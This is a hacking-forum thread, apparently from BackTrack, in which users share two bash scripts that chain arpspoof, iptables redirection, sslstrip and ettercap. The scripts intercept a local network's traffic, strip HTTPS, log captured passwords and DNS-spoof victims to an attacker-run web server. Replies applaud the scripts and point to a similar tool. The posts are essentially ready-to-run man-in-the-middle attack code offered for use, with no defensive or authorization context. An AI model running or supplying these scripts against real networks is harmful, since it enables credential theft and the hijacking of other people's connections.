Results 1 to 6 of 6

Thread: Script for dns spoof and sniffing passwords with ettercap, ssl strip, and arp spoof.

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    May 2010
    Posts
    5

    Cool Script for dns spoof and sniffing passwords with ettercap, ssl strip, and arp spoof.

    I modified a script that i found, hopefully made it a little more user friendly. I hope that it will be a benefit to the community.
    This script used ARP Spoof, SSL Strip, and ETTERCAP to sniff passwords and logs the findings to a user-specified folder. When you exit ETTERCAP properly, you will see the results from the log file using etterlog. Again, hopefully this will benefit the community.

    And also as a reminder, I don't take full credit for this script. I used the good ideas from other scripts and made this one. Also, this probably isn't perfect, so feel free to adjust it to your liking.
    Code:
    #!/bin/bash
    echo -e "Please ensure \E[32m\033[1m'echo 1 > /proc/sys/net/ipv4/ip_forward'\E[37m\033[0m has been performed as root"
    echo -e "If you plan to spoof change your IP in \E[32m\033[1m'/usr/share/ettercap/etter.dns'\E[37m\033[0m"
    echo -n "Please enter the name of the folder that will be created with all the log files:    "
    read -e folder
    echo -n "please enter the name of the log file:    "
    read -e file
    echo -n "Please enter the router IP:    "
    read routerip
    echo -n "Please enter interface name (eg: wlan0):    "
    read iface
    echo -n "Would you like to dns spoof at this time? [y/n]"
    read spoof
    sudo mkdir /root/$folder
    sudo xterm -geometry 75x15+1+300 -T "ARP Spoof" -e arpspoof -i $iface $routerip &
    sleep 2
    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 &
    echo "Routed IP Tables"
    sudo xterm -geometry 75x15+500+300 -T "SSL Strip" -e sslstrip -a -k -f &
    echo "SSL Strip Launched successfully"
    sleep 2
    if [ "$spoof" = "n" ]; then
    sudo xterm -geometry 75x15+1000+300 -T Ettercap -e ettercap -T -q -i $iface -l /root/$folder/$file -P autoadd
    else
    sudo xterm -geometry 75x15+1000+300 -T Ettercap -e ettercap -T -q -i $iface -P dns_spoof
    fi
    killall sslstrip
    killall arpspoof
    sudo etterlog -p -i /root/$folder/$file.eci
    exit
    Last edited by cqghost; 05-22-2010 at 08:55 AM.

  2. #2
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    22

    Default Re: Script for dns spoof and sniffing passwords with ettercap, ssl strip, and arp spo

    i like it thx

  3. #3
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    17

    Default Re: Script for dns spoof and sniffing passwords with ettercap, ssl strip, and arp spo

    I made a similar script, tried to make it in as few as lines as possible so user interface isn't great, you just enter Sniff or Spoof. However you need to have configured apache2 prior to using the script for spoofing to work, other wise you will just be redirecting traffic to: 'It works!'

    Code:
    #!/bin/bash
    #Middle /03/01/10
    
    gateway=$(route -n | grep -v Gateway | head -n 5 | tail -n -1  | awk  -F " " '{print $2}' )
    interface=$(route | grep -v Gateway | head -n 5 | tail -n -1  | awk  -F " " '{print $8}' )
    ip=$(ifconfig | grep Bc | awk -F " " '{print$2}' | tail -n 1 | cut -c 6-20)
    
    #Sniff
    function sniff {
    xterm -hold -e/ "echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sslstrip -p -f -k -w cap 2>/dev/null" &
    xterm -hold -e arpspoof -i $interface $gateway &
    }
    
    #Spoof
    function spoof {
    sudo /etc/init.d/apache2 start  
    echo "* A $ip" >> /usr/share/ettercap/etter.dns 
    ettercap -T -q -i $interface -M arp:remote /$gateway/ // -P dns_spoof
    }
    
    clear
    echo -n 'Sniff or Spoof?: '
    read x
    if [ $x == 'Sniff' ]; then
    $"sniff"
    fi
    if [ $x == 'Spoof' ]; then
    $"spoof"
    fi

  4. #4
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Script for dns spoof and sniffing passwords with ettercap, ssl strip, and arp spo

    I don't know why this is in the expert forum but... never mind. I also made a script, for the exact same purpose, that I think is more complete than yours (yet, doesn't mean better...). I made a thread a few days ago in the beginner forum : http://www.backtrack-linux.org/forum...utomation.html . You might also want to check http://comax.pagesperso-orange.fr/info/mitm/ for download, source, and demonstration video.

    I hope this will help !
    Last edited by comaX; 03-21-2011 at 06:43 PM.

  5. #5
    Member longjidin's Avatar
    Join Date
    Feb 2010
    Location
    Kg Lengkong to Bukit Lada
    Posts
    93

    Default Re: Script for dns spoof and sniffing passwords with ettercap, ssl strip, and arp spo

    nice bro....!! its doesnt matter just do and keep the good work. ...happy hunting!

  6. #6
    Member
    Join Date
    Sep 2010
    Location
    Eastern Island
    Posts
    96

    Default Re: Script for dns spoof and sniffing passwords with ettercap, ssl strip, and arp spo

    tnx mate!!!!!!!!!! )

Similar Threads

  1. Replies: 44
    Last Post: 04-08-2011, 02:30 AM
  2. ap spoof
    By 7ELEVEN in forum OLD Wireless
    Replies: 4
    Last Post: 11-26-2008, 03:22 AM
  3. ettercap - sniffing works, but I can't see passwords
    By Trick17 in forum OLD BackTrack v2.0 Final
    Replies: 6
    Last Post: 08-29-2007, 09:09 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •